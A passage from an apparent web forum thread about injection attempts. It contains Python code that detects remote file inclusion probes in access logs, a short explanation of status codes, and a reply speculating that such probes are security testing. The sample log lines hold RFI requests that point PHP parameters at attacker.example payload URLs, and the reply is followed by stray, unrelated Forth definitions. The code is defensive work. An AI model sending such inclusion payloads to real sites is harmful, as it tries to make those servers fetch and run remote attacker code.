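    '198.51.100.7 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir'
    '&PGV_BASE_DIRECTORY=http://attacker.example/cmd/payload.txt? HTTP/1.1" 404 294',
    '203.0.113.9 - - [14/Jul/2007:20:06:28 -0500] "GET /forums/index.php?board=13;'
    'action=display;threadid=http%3A%2F%2Fattacker.example%2Finc%2F HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Jul/2007:20:07:01 -0500] "GET /forums/index.php?board=13;'
    'action=display;threadid=2286 HTTP/1.1" 200 7311',
    '203.0.113.9 - - [12/Jul/2007:05:40:08 -0500] "GET /forums/index.php?board=15;'
    'action=display;threadid=2286/Sources/Packages.php?sourcedir='
    'http://attacker.example/asd.txt??? HTTP/1.1" 200 4800',
    'this line is not an access-log entry',
]


class Probe(NamedTuple):
    client: str
    status: int
    param: str
    url: str
    suffix_cut: bool  # value ends in '?', so any suffix the script appends
                      # becomes the query string of the remote URL


def fully_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double encoding (%253A) is seen too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(target: str):
    """Yield (name, value) pairs; accepts '&' and the ';' separator SMF uses."""
    _, _, query = target.partition("?")
    for pair in re.split(r"[&;]", query):
        name, sep, value = pair.partition("=")
        if sep:
            yield name, fully_unquote(value)


def find_rfi_probes(lines):
    """Return a Probe for every parameter value that carries a remote URL."""
    probes = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        for name, value in query_params(m.group("target")):
            hit = REMOTE_URL.search(value)
            if hit:
                probes.append(Probe(
                    client=m.group("client"),
                    status=int(m.group("status")),
                    param=name,
                    url=hit.group(0).rstrip("?"),
                    suffix_cut=value.endswith("?"),
                ))
    return probes


if __name__ == "__main__":
    for probe in find_rfi_probes(SAMPLE_LOG):
        print(probe)
```

A 404 on a hit means the targeted script is not on the host, while a 200 only says the script exists, so the next check is whether it passes that parameter to include() or fopen(). Parameters that legitimately carry URLs, such as redirect targets, will also match and need an allowlist.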
  • 02-21-2008 2:09 PM In reply to

    Re: Weird injection attempts

    I know no pages should do that, but maybe it was someone who was just trying to test the security of your web-site. I get wrong requests on my web-site sometimes as well, and as long as it doesn't breach my security it is OK. Now you can see whether or not it is really secure, and if it isn't secure, fix it. I sometimes get weirder requests than this on my web-site. (Of course, if I would test the security in this way, which I don't do unless I see something that looks like it could easily be exploited, I would instead add a message somewhere that says it is insecure and if the owner of this site can please correct it soon? If it is insecure I would notify the owner! Usually it is secure though, and that is good)
    : IF COMPILE ?-GOTO COMPILE-HERE ; IMMEDIATE
    : THEN HERE SWAP ! ; IMMEDIATE
    : ELSE COMPILE GOTO COMPILE-HERE SWAP HERE SWAP ! ; IMMEDIATE